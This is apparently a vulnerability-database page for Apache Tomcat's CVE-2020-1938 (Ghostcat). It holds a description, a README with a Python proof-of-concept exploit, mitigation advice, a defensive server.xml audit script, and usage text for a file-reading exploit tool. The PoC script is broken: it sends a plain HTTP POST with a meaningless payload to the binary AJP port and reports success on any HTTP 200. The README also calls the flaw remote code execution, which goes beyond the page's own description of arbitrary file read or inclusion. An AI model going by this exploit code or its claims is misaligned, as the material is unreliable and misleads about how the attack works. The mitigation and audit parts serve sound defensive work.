Related vulnerability
Title:
Apache Tomcat security vulnerability
(CVE-2020-1938)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation (United States). It implements support for Servlets and JavaServer Pages (JSP). The Tomcat AJP protocol in Apache Tomcat 7.* versions before 7.0.100, 8.* versions before 8.5.51 and 9.* versions before 9.0.31 contains a security vulnerability. An attacker can exploit it to read or include arbitrary files under any webapp directory on the Tomcat instance, such as webapp configuration files or source code.
Description
poc-CVE-2020-1938
Introduction
# About
CVE-2020-1938 is a critical vulnerability affecting the Apache Tomcat server that allows remote code execution (RCE). It specifically concerns the AJP (Apache JServ Protocol) connector, which is often enabled by default. This vulnerability arises from the improper handling of requests, allowing an attacker to exploit the AJP interface to read arbitrary files on the server or even execute commands.
## Understanding CVE-2020-1938
- **Description**: The vulnerability exists in the way Tomcat processes AJP requests. An attacker can craft a malicious request that exploits this vulnerability, potentially leading to unauthorized access to sensitive information or execution of arbitrary code. The flaw is primarily tied to Tomcat configurations where the AJP connector is exposed to the internet without adequate protections.
- **Affected Versions**: This vulnerability affects multiple versions of Apache Tomcat, specifically those where the AJP connector is enabled. Users of Tomcat 7.x, 8.x, and 9.x need to be particularly vigilant.
- **Impact**: Successful exploitation can lead to severe security breaches, including unauthorized file access, data leaks, and remote code execution. As a result, it is critical for organizations to take proactive measures to mitigate this risk.
## Proof of Concept (PoC) for CVE-2020-1938
A proof of concept (PoC) is typically a demonstration of the vulnerability in action, allowing security professionals to test whether their systems are vulnerable. Here's how you can use a PoC for CVE-2020-1938.
### Prerequisites
1. **Environment Setup**:
   - A vulnerable instance of Apache Tomcat (preferably version 7.x, 8.x, or 9.x with the AJP connector enabled).
   - Access to a system where you can run Python scripts or any other scripting language that can make HTTP requests.
2. **Networking**: Ensure that the AJP port (default 8009) is accessible from the machine running the PoC.
### Example PoC Script
Below is a simplified Python script that demonstrates how an attacker could exploit CVE-2020-1938.
```python
import requests

# Target information (placeholders). Note that this simplified script sends a
# plain HTTP POST via the requests library, whereas the AJP connector itself
# speaks a separate binary protocol.
target_ip = "http://<TARGET_IP>:<AJP_PORT>"
payload = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b"/path/to/file" + b'\x00'

# Crafting the exploit
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Forwarded-For": "127.0.0.1",
    "User-Agent": "Mozilla/5.0"
}

# Sending the request
try:
    response = requests.post(target_ip, data=payload, headers=headers, timeout=5)
    if response.status_code == 200:
        print("Exploit successful, response:")
        print(response.text)
    else:
        print("Exploit failed, status code:", response.status_code)
except Exception as e:
    print("An error occurred:", str(e))
```
## Mitigation Strategies
1. **Configuration Changes**: Disable the AJP connector if it is not needed. If it is required, restrict access using firewall rules.
2. **Upgrade Tomcat**: Ensure you are using a version of Tomcat that is not vulnerable to CVE-2020-1938. Always apply security updates promptly.
3. **Monitoring and Logging**: Implement monitoring solutions to track unusual activity on your Tomcat servers. Log all access to the AJP connector for later analysis.
4. **Network Security**: Use network segmentation to ensure that only trusted networks can access your application servers, particularly those using AJP.
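The first two mitigations above (disable or restrict the AJP connector; run a fixed Tomcat release) can be checked mechanically. The following script is an added example written for this page, not code from the poc-CVE-2020-1938 repository: it compares a Tomcat version string against the fixed releases named in the description above (7.0.100, 8.5.51, 9.0.31) and inspects the AJP `<Connector>` elements of a `server.xml` for a connector that is bound to all interfaces or runs without a shared secret. The two embedded `server.xml` documents are constructed samples; `address`, `secretRequired` and `secret` are real Tomcat AJP connector attributes, and the secret value is a placeholder.

```python
"""Defensive audit for CVE-2020-1938 (added example, not the repository's code):
checks a Tomcat version against the fixed releases and flags AJP connectors in
server.xml that are reachable from every interface or lack a shared secret."""
import re
import xml.etree.ElementTree as ET

# First fixed release of each affected branch (from the vulnerability description).
FIXED_VERSIONS = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}

# Bind addresses that expose the connector on every interface.
ALL_INTERFACES = {"0.0.0.0", "::", "::0", "0:0:0:0:0:0:0:0"}

# Constructed sample: the classic pre-fix layout, AJP enabled with no address or secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Constructed sample: AJP bound to loopback with a shared secret (placeholder value).
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET"
               redirectPort="8443"/>
  </Service>
</Server>"""


def parse_version(version):
    """'9.0.30' -> (9, 0, 30); raises ValueError on anything that is not x.y.z."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    return tuple(int(x) for x in m.groups())


def version_is_vulnerable(version):
    """True when the version falls in an affected range (7.x < 7.0.100,
    8.x < 8.5.51, 9.x < 9.0.31). Branches not named in the advisory are
    treated as not affected."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[0])
    return fixed is not None and v < fixed


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector that needs attention, as
    {"port": ..., "issues": [...]}. Connectors that are bound to a specific
    non-wildcard address and carry a shared secret produce no finding."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        # Matches both "AJP/1.3" and the explicit org.apache.coyote.ajp.* class names.
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        issues = []
        # Before the fixed releases an absent address meant every interface, so an
        # explicit loopback or internal address is required to pass.
        address = conn.get("address")
        if address is None or address in ALL_INTERFACES:
            issues.append("exposed-address")
        # A missing secret is flagged regardless of which version's default applies.
        if conn.get("secretRequired", "true").lower() == "false" or not conn.get("secret"):
            issues.append("no-secret")
        if issues:
            findings.append({"port": conn.get("port", "8009"), "issues": issues})
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(f"{name}: {audit_ajp_connectors(doc)}")
    for ver in ("9.0.30", "9.0.31", "8.5.50", "7.0.100"):
        print(f"Tomcat {ver} vulnerable: {version_is_vulnerable(ver)}")
```

Run it against a real `server.xml` by reading the file into `audit_ajp_connectors`; the audit deliberately treats a connector that relies on version defaults for `address` or `secret` as a finding, because a later downgrade or a copied config would silently reopen the connector.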
# Usage
```
usage: CVE-2020-1938.py [-h] [-p PORT] [-f FILE] target

positional arguments:
  target                Hostname or IP to attack

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  AJP port to attack (default is 8009)
  -f FILE, --file FILE  file path on the server (default is WEB-INF/web.xml)
```
File snapshot
[4.0K] /data/pocs/17132e0c1ef55947d73835a53b99212d7ac60a17
├── [ 16K] cve-2020-1938.py
└── [3.7K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.